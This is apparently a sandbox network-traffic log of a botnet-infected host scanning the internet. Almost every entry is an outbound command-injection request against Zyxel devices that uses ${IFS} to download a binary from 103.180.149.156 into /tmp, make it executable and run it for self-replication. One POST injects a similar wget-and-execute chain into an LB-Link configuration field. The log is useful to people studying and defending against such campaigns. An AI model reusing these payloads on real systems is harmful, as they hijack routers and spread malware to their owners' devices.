                                                        Feb 2, 2024 06:21:10.951441050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4730192.168.2.1455596190.83.235.47443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.951492071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4731192.168.2.1455760152.245.174.1443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.951527119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4732192.168.2.1442638123.135.133.24443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.951548100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4733192.168.2.143343419.124.64.67443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.951605082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4734192.168.2.1438002118.196.47.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.951646090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4735192.168.2.1439012172.211.169.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.951706886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4736192.168.2.1460100142.102.60.213443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.951745987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4737192.168.2.144807884.228.103.161443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.951766968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4738192.168.2.1437906204.56.199.182443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.951812983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4739192.168.2.1434272155.212.114.239443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.951872110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4740192.168.2.1458086201.245.190.206443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.951896906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4741192.168.2.1442746193.19.211.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.951941967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4742192.168.2.1460984203.23.164.255443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.951997995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4743192.168.2.1437314217.64.78.189443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.952049971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4744192.168.2.1453824186.157.255.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.952080011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4745192.168.2.1456952157.78.244.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.952133894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4746192.168.2.1445598222.47.8.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.952164888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4747192.168.2.1440278220.112.109.4443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.952214956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4748192.168.2.1458100141.240.220.24443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.952260017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4749192.168.2.1441046141.130.21.18443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.952290058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4750192.168.2.1434258144.163.129.84443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.952334881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4751192.168.2.1433916187.145.167.33443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.952374935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4752192.168.2.143959659.250.101.32443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.956088066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4753192.168.2.1446646159.155.236.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.956132889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4754192.168.2.1453402188.120.91.9443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.956175089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4755192.168.2.145268239.118.177.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.956216097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4756192.168.2.143426219.5.114.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.956257105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4757192.168.2.1447432191.151.155.217443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.956273079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4758192.168.2.1449570198.97.96.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.956315994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4759192.168.2.144289412.95.48.154443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.956331015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4760192.168.2.143714893.165.122.40443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.956384897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4761192.168.2.144790884.118.67.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.956423998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4762192.168.2.145735454.131.123.59443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.956449986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4763192.168.2.1460142172.209.253.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.956491947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4764192.168.2.144656497.107.130.1368080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.933386087 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                        Feb 2, 2024 06:21:12.056123018 CET1286INHTTP/1.1 400
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Language: en
                                                        Content-Length: 1136
                                                        Date: Fri, 02 Feb 2024 05:21:11 GMT
                                                        Connection: close
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 30 20 e2 80 93 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 68 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 62 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 61 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 30 20 e2 80 93 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 73 65 72 76 65 72 20 63 61 6e 6e 6f 74 20 6f 72 20 77 69 6c 6c 20 6e 6f 74 20 70 72 6f 63 65 73 73 20 74 68 65 20 72 65 71 75 65 73 74 20 64 75 65 20 74 6f 20 73 6f 6d 65 74 68 69 6e 67 20 74 68 61 74 20 69 73 20 70 65 72 63 65 69 76 65 64 20 74 6f 20 62 65 20 61 20 63 6c 69 65 6e 74 20 65 72 72 6f 72 20 28 65 2e 67 2e 2c 20 6d 61 6c 66 6f 72 6d 65 64 20 72 65 71 75 65 73 74 20 73 79 6e 74 61 78 2c 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 20 6d 65 73 73 61 67 65 20 66 72 61 6d 69 6e 67 2c 20 6f 72 20 64 65 63 65 70 74 69 76 65 20 72 65 71 75 65 73 74 20 72 6f 75 74 69 6e 67 29 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 39 2e 30 2e 31 36 20 28 55 62 75 6e 74 75 29 3c
                                                        Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 400 Bad Request</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 Bad Request</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Description</b> The server cannot or will not process the request due to something that is perceived to be a client error (e.g., malformed request syntax, invalid request message framing, or deceptive request routing).</p><hr class="line" /><h3>Apache Tomcat/9.0.16 (Ubuntu)<


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4765192.168.2.1452228189.72.175.239443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.964684010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4766192.168.2.1446566140.188.6.191443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.964716911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4767192.168.2.145426250.106.182.232443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.964770079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4768192.168.2.14568984.232.255.48443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.964804888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4769192.168.2.1447452185.179.207.75443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.964852095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4770192.168.2.1443306221.28.221.64443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.964880943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4771192.168.2.145252677.16.135.141443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.964922905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4772192.168.2.1458044200.38.200.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.964958906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4773192.168.2.1435542223.115.24.100443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.964978933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4774192.168.2.144598224.195.122.40443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.965040922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4775192.168.2.145549419.70.64.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.965074062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4776192.168.2.145213213.126.195.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.965104103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


